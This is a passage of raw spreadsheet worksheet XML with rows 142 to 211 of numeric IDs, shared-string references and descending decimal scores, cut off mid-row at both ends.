      <c r="B142" s="2">
        <v>1.1970992E7</v>
      </c>
      <c r="C142" s="2" t="s">
        <v>119</v>
      </c>
      <c r="D142" s="2">
        <v>1.0</v>
      </c>
      <c r="E142" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F142" s="2">
        <v>0.172067901234568</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1">
      <c r="A143" s="1">
        <v>26763.0</v>
      </c>
      <c r="B143" s="2">
        <v>1.846027E7</v>
      </c>
      <c r="C143" s="2" t="s">
        <v>120</v>
      </c>
      <c r="D143" s="2">
        <v>1.0</v>
      </c>
      <c r="E143" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F143" s="2">
        <v>0.1717948717948718</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1">
      <c r="A144" s="1">
        <v>27243.0</v>
      </c>
      <c r="B144" s="2">
        <v>2.1054836E7</v>
      </c>
      <c r="C144" s="2" t="s">
        <v>121</v>
      </c>
      <c r="D144" s="2">
        <v>1.0</v>
      </c>
      <c r="E144" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F144" s="2">
        <v>0.1713615023474179</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1">
      <c r="A145" s="1">
        <v>27737.0</v>
      </c>
      <c r="B145" s="2">
        <v>2.308052E7</v>
      </c>
      <c r="C145" s="2" t="s">
        <v>122</v>
      </c>
      <c r="D145" s="2">
        <v>1.0</v>
      </c>
      <c r="E145" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F145" s="2">
        <v>0.1710069444444445</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1">
      <c r="A146" s="1">
        <v>33914.0</v>
      </c>
      <c r="B146" s="2">
        <v>9236453.0</v>
      </c>
      <c r="C146" s="2" t="s">
        <v>123</v>
      </c>
      <c r="D146" s="2">
        <v>1.0</v>
      </c>
      <c r="E146" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F146" s="2">
        <v>0.1704331450094163</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1">
      <c r="A147" s="1">
        <v>26599.0</v>
      </c>
      <c r="B147" s="2">
        <v>1.798581E7</v>
      </c>
      <c r="C147" s="2" t="s">
        <v>115</v>
      </c>
      <c r="D147" s="2">
        <v>1.0</v>
      </c>
      <c r="E147" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F147" s="2">
        <v>0.1704331450094162</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1">
      <c r="A148" s="1">
        <v>32049.0</v>
      </c>
      <c r="B148" s="2">
        <v>5.3703156E7</v>
      </c>
      <c r="C148" s="2" t="s">
        <v>124</v>
      </c>
      <c r="D148" s="2">
        <v>1.0</v>
      </c>
      <c r="E148" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F148" s="2">
        <v>0.1704331450094162</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1">
      <c r="A149" s="1">
        <v>27765.0</v>
      </c>
      <c r="B149" s="2">
        <v>2.3107794E7</v>
      </c>
      <c r="C149" s="2" t="s">
        <v>125</v>
      </c>
      <c r="D149" s="2">
        <v>1.0</v>
      </c>
      <c r="E149" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F149" s="2">
        <v>0.1701940035273369</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1">
      <c r="A150" s="1">
        <v>28359.0</v>
      </c>
      <c r="B150" s="2">
        <v>2.6021068E7</v>
      </c>
      <c r="C150" s="2" t="s">
        <v>126</v>
      </c>
      <c r="D150" s="2">
        <v>1.0</v>
      </c>
      <c r="E150" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F150" s="2">
        <v>0.169983416252073</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1">
      <c r="A151" s="1">
        <v>15917.0</v>
      </c>
      <c r="B151" s="2">
        <v>4.4662843E7</v>
      </c>
      <c r="C151" s="2" t="s">
        <v>127</v>
      </c>
      <c r="D151" s="2">
        <v>1.0</v>
      </c>
      <c r="E151" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F151" s="2">
        <v>0.1698872785829308</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1">
      <c r="A152" s="1">
        <v>26449.0</v>
      </c>
      <c r="B152" s="2">
        <v>1.7292156E7</v>
      </c>
      <c r="C152" s="2" t="s">
        <v>128</v>
      </c>
      <c r="D152" s="2">
        <v>1.0</v>
      </c>
      <c r="E152" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F152" s="2">
        <v>0.1695402298850575</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1">
      <c r="A153" s="1">
        <v>34115.0</v>
      </c>
      <c r="B153" s="2">
        <v>9755821.0</v>
      </c>
      <c r="C153" s="2" t="s">
        <v>129</v>
      </c>
      <c r="D153" s="2">
        <v>1.0</v>
      </c>
      <c r="E153" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F153" s="2">
        <v>0.1695402298850575</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1">
      <c r="A154" s="1">
        <v>29089.0</v>
      </c>
      <c r="B154" s="2">
        <v>3.0366813E7</v>
      </c>
      <c r="C154" s="2" t="s">
        <v>130</v>
      </c>
      <c r="D154" s="2">
        <v>1.0</v>
      </c>
      <c r="E154" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F154" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1">
      <c r="A155" s="1">
        <v>29731.0</v>
      </c>
      <c r="B155" s="2">
        <v>3.4565989E7</v>
      </c>
      <c r="C155" s="2" t="s">
        <v>131</v>
      </c>
      <c r="D155" s="2">
        <v>1.0</v>
      </c>
      <c r="E155" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F155" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1">
      <c r="A156" s="1">
        <v>25980.0</v>
      </c>
      <c r="B156" s="2">
        <v>1.5295401E7</v>
      </c>
      <c r="C156" s="2" t="s">
        <v>109</v>
      </c>
      <c r="D156" s="2">
        <v>1.0</v>
      </c>
      <c r="E156" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F156" s="2">
        <v>0.1690476190476191</v>
      </c>
    </row>
    <row r="157" ht="15.75" customHeight="1">
      <c r="A157" s="1">
        <v>26017.0</v>
      </c>
      <c r="B157" s="2">
        <v>1.5372193E7</v>
      </c>
      <c r="C157" s="2" t="s">
        <v>132</v>
      </c>
      <c r="D157" s="2">
        <v>1.0</v>
      </c>
      <c r="E157" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F157" s="2">
        <v>0.168488160291439</v>
      </c>
    </row>
    <row r="158" ht="15.75" customHeight="1">
      <c r="A158" s="1">
        <v>28692.0</v>
      </c>
      <c r="B158" s="2">
        <v>2.7645392E7</v>
      </c>
      <c r="C158" s="2" t="s">
        <v>133</v>
      </c>
      <c r="D158" s="2">
        <v>1.0</v>
      </c>
      <c r="E158" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F158" s="2">
        <v>0.1683760683760684</v>
      </c>
    </row>
    <row r="159" ht="15.75" customHeight="1">
      <c r="A159" s="1">
        <v>20969.0</v>
      </c>
      <c r="B159" s="2">
        <v>1.6791956E7</v>
      </c>
      <c r="C159" s="2" t="s">
        <v>113</v>
      </c>
      <c r="D159" s="2">
        <v>1.0</v>
      </c>
      <c r="E159" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F159" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="160" ht="15.75" customHeight="1">
      <c r="A160" s="1">
        <v>29120.0</v>
      </c>
      <c r="B160" s="2">
        <v>3.0454321E7</v>
      </c>
      <c r="C160" s="2" t="s">
        <v>134</v>
      </c>
      <c r="D160" s="2">
        <v>1.0</v>
      </c>
      <c r="E160" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F160" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="161" ht="15.75" customHeight="1">
      <c r="A161" s="1">
        <v>16617.0</v>
      </c>
      <c r="B161" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C161" s="2" t="s">
        <v>135</v>
      </c>
      <c r="D161" s="2">
        <v>1.0</v>
      </c>
      <c r="E161" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F161" s="2">
        <v>0.1675084175084176</v>
      </c>
    </row>
    <row r="162" ht="15.75" customHeight="1">
      <c r="A162" s="1">
        <v>29966.0</v>
      </c>
      <c r="B162" s="2">
        <v>3608762.0</v>
      </c>
      <c r="C162" s="2" t="s">
        <v>109</v>
      </c>
      <c r="D162" s="2">
        <v>1.0</v>
      </c>
      <c r="E162" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F162" s="2">
        <v>0.1674603174603175</v>
      </c>
    </row>
    <row r="163" ht="15.75" customHeight="1">
      <c r="A163" s="1">
        <v>15942.0</v>
      </c>
      <c r="B163" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C163" s="2" t="s">
        <v>136</v>
      </c>
      <c r="D163" s="2">
        <v>1.0</v>
      </c>
      <c r="E163" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F163" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="164" ht="15.75" customHeight="1">
      <c r="A164" s="1">
        <v>20253.0</v>
      </c>
      <c r="B164" s="2">
        <v>1.0986315E7</v>
      </c>
      <c r="C164" s="2" t="s">
        <v>137</v>
      </c>
      <c r="D164" s="2">
        <v>1.0</v>
      </c>
      <c r="E164" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F164" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="165" ht="15.75" customHeight="1">
      <c r="A165" s="1">
        <v>23273.0</v>
      </c>
      <c r="B165" s="2">
        <v>5.3430469E7</v>
      </c>
      <c r="C165" s="2" t="s">
        <v>138</v>
      </c>
      <c r="D165" s="2">
        <v>1.0</v>
      </c>
      <c r="E165" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F165" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="166" ht="15.75" customHeight="1">
      <c r="A166" s="1">
        <v>23355.0</v>
      </c>
      <c r="B166" s="2">
        <v>5.4933829E7</v>
      </c>
      <c r="C166" s="2" t="s">
        <v>139</v>
      </c>
      <c r="D166" s="2">
        <v>1.0</v>
      </c>
      <c r="E166" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F166" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="167" ht="15.75" customHeight="1">
      <c r="A167" s="1">
        <v>24560.0</v>
      </c>
      <c r="B167" s="2">
        <v>1.1301177E7</v>
      </c>
      <c r="C167" s="2" t="s">
        <v>140</v>
      </c>
      <c r="D167" s="2">
        <v>1.0</v>
      </c>
      <c r="E167" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F167" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="168" ht="15.75" customHeight="1">
      <c r="A168" s="1">
        <v>28086.0</v>
      </c>
      <c r="B168" s="2">
        <v>2.4639451E7</v>
      </c>
      <c r="C168" s="2" t="s">
        <v>141</v>
      </c>
      <c r="D168" s="2">
        <v>1.0</v>
      </c>
      <c r="E168" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F168" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="169" ht="15.75" customHeight="1">
      <c r="A169" s="1">
        <v>29726.0</v>
      </c>
      <c r="B169" s="2">
        <v>3.454971E7</v>
      </c>
      <c r="C169" s="2" t="s">
        <v>142</v>
      </c>
      <c r="D169" s="2">
        <v>1.0</v>
      </c>
      <c r="E169" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F169" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="170" ht="15.75" customHeight="1">
      <c r="A170" s="1">
        <v>30304.0</v>
      </c>
      <c r="B170" s="2">
        <v>3.7932398E7</v>
      </c>
      <c r="C170" s="2" t="s">
        <v>143</v>
      </c>
      <c r="D170" s="2">
        <v>1.0</v>
      </c>
      <c r="E170" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F170" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="171" ht="15.75" customHeight="1">
      <c r="A171" s="1">
        <v>30708.0</v>
      </c>
      <c r="B171" s="2">
        <v>4.286438E7</v>
      </c>
      <c r="C171" s="2" t="s">
        <v>144</v>
      </c>
      <c r="D171" s="2">
        <v>1.0</v>
      </c>
      <c r="E171" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F171" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="172" ht="15.75" customHeight="1">
      <c r="A172" s="1">
        <v>30995.0</v>
      </c>
      <c r="B172" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C172" s="2" t="s">
        <v>145</v>
      </c>
      <c r="D172" s="2">
        <v>1.0</v>
      </c>
      <c r="E172" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F172" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="173" ht="15.75" customHeight="1">
      <c r="A173" s="1">
        <v>22039.0</v>
      </c>
      <c r="B173" s="2">
        <v>3.0205178E7</v>
      </c>
      <c r="C173" s="2" t="s">
        <v>146</v>
      </c>
      <c r="D173" s="2">
        <v>1.0</v>
      </c>
      <c r="E173" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F173" s="2">
        <v>0.1657986111111112</v>
      </c>
    </row>
    <row r="174" ht="15.75" customHeight="1">
      <c r="A174" s="1">
        <v>22691.0</v>
      </c>
      <c r="B174" s="2">
        <v>4.2263634E7</v>
      </c>
      <c r="C174" s="2" t="s">
        <v>147</v>
      </c>
      <c r="D174" s="2">
        <v>1.0</v>
      </c>
      <c r="E174" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F174" s="2">
        <v>0.1657986111111112</v>
      </c>
    </row>
    <row r="175" ht="15.75" customHeight="1">
      <c r="A175" s="1">
        <v>29704.0</v>
      </c>
      <c r="B175" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C175" s="2" t="s">
        <v>148</v>
      </c>
      <c r="D175" s="2">
        <v>1.0</v>
      </c>
      <c r="E175" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F175" s="2">
        <v>0.1657706093189965</v>
      </c>
    </row>
    <row r="176" ht="15.75" customHeight="1">
      <c r="A176" s="1">
        <v>27510.0</v>
      </c>
      <c r="B176" s="2">
        <v>2.21407E7</v>
      </c>
      <c r="C176" s="2" t="s">
        <v>149</v>
      </c>
      <c r="D176" s="2">
        <v>1.0</v>
      </c>
      <c r="E176" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F176" s="2">
        <v>0.1657407407407407</v>
      </c>
    </row>
    <row r="177" ht="15.75" customHeight="1">
      <c r="A177" s="1">
        <v>28935.0</v>
      </c>
      <c r="B177" s="2">
        <v>2.9610407E7</v>
      </c>
      <c r="C177" s="2" t="s">
        <v>150</v>
      </c>
      <c r="D177" s="2">
        <v>1.0</v>
      </c>
      <c r="E177" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F177" s="2">
        <v>0.1657407407407407</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1">
      <c r="A178" s="1">
        <v>31936.0</v>
      </c>
      <c r="B178" s="2">
        <v>5305124.0</v>
      </c>
      <c r="C178" s="2" t="s">
        <v>151</v>
      </c>
      <c r="D178" s="2">
        <v>1.0</v>
      </c>
      <c r="E178" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F178" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1">
      <c r="A179" s="1">
        <v>32530.0</v>
      </c>
      <c r="B179" s="2">
        <v>5.7339863E7</v>
      </c>
      <c r="C179" s="2" t="s">
        <v>152</v>
      </c>
      <c r="D179" s="2">
        <v>1.0</v>
      </c>
      <c r="E179" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F179" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1">
      <c r="A180" s="1">
        <v>13415.0</v>
      </c>
      <c r="B180" s="2">
        <v>3.5023938E7</v>
      </c>
      <c r="C180" s="2" t="s">
        <v>153</v>
      </c>
      <c r="D180" s="2">
        <v>1.0</v>
      </c>
      <c r="E180" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F180" s="2">
        <v>0.1642857142857144</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1">
      <c r="A181" s="1">
        <v>9983.0</v>
      </c>
      <c r="B181" s="2">
        <v>5.695416E7</v>
      </c>
      <c r="C181" s="2" t="s">
        <v>154</v>
      </c>
      <c r="D181" s="2">
        <v>1.0</v>
      </c>
      <c r="E181" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F181" s="2">
        <v>0.1642156862745099</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1">
      <c r="A182" s="1">
        <v>21687.0</v>
      </c>
      <c r="B182" s="2">
        <v>2.5139189E7</v>
      </c>
      <c r="C182" s="2" t="s">
        <v>155</v>
      </c>
      <c r="D182" s="2">
        <v>1.0</v>
      </c>
      <c r="E182" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F182" s="2">
        <v>0.1642156862745098</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1">
      <c r="A183" s="1">
        <v>28231.0</v>
      </c>
      <c r="B183" s="2">
        <v>2.5139188E7</v>
      </c>
      <c r="C183" s="2" t="s">
        <v>155</v>
      </c>
      <c r="D183" s="2">
        <v>1.0</v>
      </c>
      <c r="E183" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F183" s="2">
        <v>0.1642156862745098</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1">
      <c r="A184" s="1">
        <v>28262.0</v>
      </c>
      <c r="B184" s="2">
        <v>2.5368488E7</v>
      </c>
      <c r="C184" s="2" t="s">
        <v>156</v>
      </c>
      <c r="D184" s="2">
        <v>1.0</v>
      </c>
      <c r="E184" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F184" s="2">
        <v>0.1640625000000001</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1">
      <c r="A185" s="1">
        <v>22103.0</v>
      </c>
      <c r="B185" s="2">
        <v>3.0839652E7</v>
      </c>
      <c r="C185" s="2" t="s">
        <v>157</v>
      </c>
      <c r="D185" s="2">
        <v>1.0</v>
      </c>
      <c r="E185" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F185" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1">
      <c r="A186" s="1">
        <v>22641.0</v>
      </c>
      <c r="B186" s="2">
        <v>4.0678165E7</v>
      </c>
      <c r="C186" s="2" t="s">
        <v>158</v>
      </c>
      <c r="D186" s="2">
        <v>1.0</v>
      </c>
      <c r="E186" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F186" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1">
      <c r="A187" s="1">
        <v>23246.0</v>
      </c>
      <c r="B187" s="2">
        <v>5305125.0</v>
      </c>
      <c r="C187" s="2" t="s">
        <v>159</v>
      </c>
      <c r="D187" s="2">
        <v>1.0</v>
      </c>
      <c r="E187" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F187" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1">
      <c r="A188" s="1">
        <v>20819.0</v>
      </c>
      <c r="B188" s="2">
        <v>1.5392586E7</v>
      </c>
      <c r="C188" s="2" t="s">
        <v>160</v>
      </c>
      <c r="D188" s="2">
        <v>1.0</v>
      </c>
      <c r="E188" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F188" s="2">
        <v>0.1638888888888889</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1">
      <c r="A189" s="1">
        <v>22187.0</v>
      </c>
      <c r="B189" s="2">
        <v>3.174666E7</v>
      </c>
      <c r="C189" s="2" t="s">
        <v>161</v>
      </c>
      <c r="D189" s="2">
        <v>1.0</v>
      </c>
      <c r="E189" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F189" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1">
      <c r="A190" s="1">
        <v>25974.0</v>
      </c>
      <c r="B190" s="2">
        <v>1.5292334E7</v>
      </c>
      <c r="C190" s="2" t="s">
        <v>162</v>
      </c>
      <c r="D190" s="2">
        <v>1.0</v>
      </c>
      <c r="E190" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F190" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1">
      <c r="A191" s="1">
        <v>30453.0</v>
      </c>
      <c r="B191" s="2">
        <v>3.9443945E7</v>
      </c>
      <c r="C191" s="2" t="s">
        <v>163</v>
      </c>
      <c r="D191" s="2">
        <v>1.0</v>
      </c>
      <c r="E191" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F191" s="2">
        <v>0.1631393298059965</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1">
      <c r="A192" s="1">
        <v>17127.0</v>
      </c>
      <c r="B192" s="2">
        <v>4.8815266E7</v>
      </c>
      <c r="C192" s="2" t="s">
        <v>164</v>
      </c>
      <c r="D192" s="2">
        <v>1.0</v>
      </c>
      <c r="E192" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F192" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1">
      <c r="A193" s="1">
        <v>17797.0</v>
      </c>
      <c r="B193" s="2">
        <v>5.0803686E7</v>
      </c>
      <c r="C193" s="2" t="s">
        <v>165</v>
      </c>
      <c r="D193" s="2">
        <v>1.0</v>
      </c>
      <c r="E193" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F193" s="2">
        <v>0.1627680311890839</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1">
      <c r="A194" s="1">
        <v>26101.0</v>
      </c>
      <c r="B194" s="2">
        <v>1.5740224E7</v>
      </c>
      <c r="C194" s="2" t="s">
        <v>166</v>
      </c>
      <c r="D194" s="2">
        <v>1.0</v>
      </c>
      <c r="E194" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F194" s="2">
        <v>0.1624579124579125</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1">
      <c r="A195" s="1">
        <v>29046.0</v>
      </c>
      <c r="B195" s="2">
        <v>3.0205177E7</v>
      </c>
      <c r="C195" s="2" t="s">
        <v>146</v>
      </c>
      <c r="D195" s="2">
        <v>1.0</v>
      </c>
      <c r="E195" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F195" s="2">
        <v>0.162326388888889</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1">
      <c r="A196" s="1">
        <v>26428.0</v>
      </c>
      <c r="B196" s="2">
        <v>1.7155444E7</v>
      </c>
      <c r="C196" s="2" t="s">
        <v>167</v>
      </c>
      <c r="D196" s="2">
        <v>1.0</v>
      </c>
      <c r="E196" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F196" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1">
      <c r="A197" s="1">
        <v>27334.0</v>
      </c>
      <c r="B197" s="2">
        <v>2.1451672E7</v>
      </c>
      <c r="C197" s="2" t="s">
        <v>148</v>
      </c>
      <c r="D197" s="2">
        <v>1.0</v>
      </c>
      <c r="E197" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F197" s="2">
        <v>0.1621863799283155</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1">
      <c r="A198" s="1">
        <v>29750.0</v>
      </c>
      <c r="B198" s="2">
        <v>3.4743205E7</v>
      </c>
      <c r="C198" s="2" t="s">
        <v>168</v>
      </c>
      <c r="D198" s="2">
        <v>1.0</v>
      </c>
      <c r="E198" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F198" s="2">
        <v>0.1620370370370371</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1">
      <c r="A199" s="1">
        <v>29774.0</v>
      </c>
      <c r="B199" s="2">
        <v>3.4960152E7</v>
      </c>
      <c r="C199" s="2" t="s">
        <v>169</v>
      </c>
      <c r="D199" s="2">
        <v>1.0</v>
      </c>
      <c r="E199" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F199" s="2">
        <v>0.1619718309859155</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1">
      <c r="A200" s="1">
        <v>29624.0</v>
      </c>
      <c r="B200" s="2">
        <v>3.3669857E7</v>
      </c>
      <c r="C200" s="2" t="s">
        <v>170</v>
      </c>
      <c r="D200" s="2">
        <v>1.0</v>
      </c>
      <c r="E200" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F200" s="2">
        <v>0.1618357487922706</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1">
      <c r="A201" s="1">
        <v>30534.0</v>
      </c>
      <c r="B201" s="2">
        <v>4.0518272E7</v>
      </c>
      <c r="C201" s="2" t="s">
        <v>171</v>
      </c>
      <c r="D201" s="2">
        <v>1.0</v>
      </c>
      <c r="E201" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F201" s="2">
        <v>0.1616915422885573</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1">
      <c r="A202" s="1">
        <v>22015.0</v>
      </c>
      <c r="B202" s="2">
        <v>2.9952143E7</v>
      </c>
      <c r="C202" s="2" t="s">
        <v>172</v>
      </c>
      <c r="D202" s="2">
        <v>1.0</v>
      </c>
      <c r="E202" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F202" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1">
      <c r="A203" s="1">
        <v>22236.0</v>
      </c>
      <c r="B203" s="2">
        <v>3.250687E7</v>
      </c>
      <c r="C203" s="2" t="s">
        <v>173</v>
      </c>
      <c r="D203" s="2">
        <v>1.0</v>
      </c>
      <c r="E203" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F203" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1">
      <c r="A204" s="1">
        <v>29315.0</v>
      </c>
      <c r="B204" s="2">
        <v>3.1303276E7</v>
      </c>
      <c r="C204" s="2" t="s">
        <v>174</v>
      </c>
      <c r="D204" s="2">
        <v>1.0</v>
      </c>
      <c r="E204" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F204" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1">
      <c r="A205" s="1">
        <v>31929.0</v>
      </c>
      <c r="B205" s="2">
        <v>5305124.0</v>
      </c>
      <c r="C205" s="2" t="s">
        <v>175</v>
      </c>
      <c r="D205" s="2">
        <v>1.0</v>
      </c>
      <c r="E205" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F205" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="206" ht="15.75" customHeight="1">
      <c r="A206" s="1">
        <v>23419.0</v>
      </c>
      <c r="B206" s="2">
        <v>5.6255265E7</v>
      </c>
      <c r="C206" s="2" t="s">
        <v>176</v>
      </c>
      <c r="D206" s="2">
        <v>1.0</v>
      </c>
      <c r="E206" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F206" s="2">
        <v>0.1610169491525424</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1">
      <c r="A207" s="1">
        <v>30870.0</v>
      </c>
      <c r="B207" s="2">
        <v>4.625055E7</v>
      </c>
      <c r="C207" s="2" t="s">
        <v>177</v>
      </c>
      <c r="D207" s="2">
        <v>1.0</v>
      </c>
      <c r="E207" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F207" s="2">
        <v>0.1608946608946609</v>
      </c>
    </row>
    <row r="208" ht="15.75" customHeight="1">
      <c r="A208" s="1">
        <v>20821.0</v>
      </c>
      <c r="B208" s="2">
        <v>1.5403158E7</v>
      </c>
      <c r="C208" s="2" t="s">
        <v>178</v>
      </c>
      <c r="D208" s="2">
        <v>1.0</v>
      </c>
      <c r="E208" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F208" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="209" ht="15.75" customHeight="1">
      <c r="A209" s="1">
        <v>21236.0</v>
      </c>
      <c r="B209" s="2">
        <v>1.9714447E7</v>
      </c>
      <c r="C209" s="2" t="s">
        <v>179</v>
      </c>
      <c r="D209" s="2">
        <v>1.0</v>
      </c>
      <c r="E209" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F209" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="210" ht="15.75" customHeight="1">
      <c r="A210" s="1">
        <v>26031.0</v>
      </c>
      <c r="B210" s="2">
        <v>1.5403157E7</v>
      </c>
      <c r="C210" s="2" t="s">
        <v>180</v>
      </c>
      <c r="D210" s="2">
        <v>1.0</v>
      </c>
      <c r="E210" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F210" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="211" ht="15.75" customHeight="1">
      <c r="A211" s="1">
        <v>26721.0</v>
      </c>
      <c r="B211" s="2">
        <v>1.8233062E7</v>
      </c>
      <c r="C211" s="2" t="s">
        <v>181</v>
      </c>
      <c r="D211" s="2">
        <v>1.0</v>
      </c>
      <c r="E211" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F211" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="212" ht="15.75" customHeight="1">
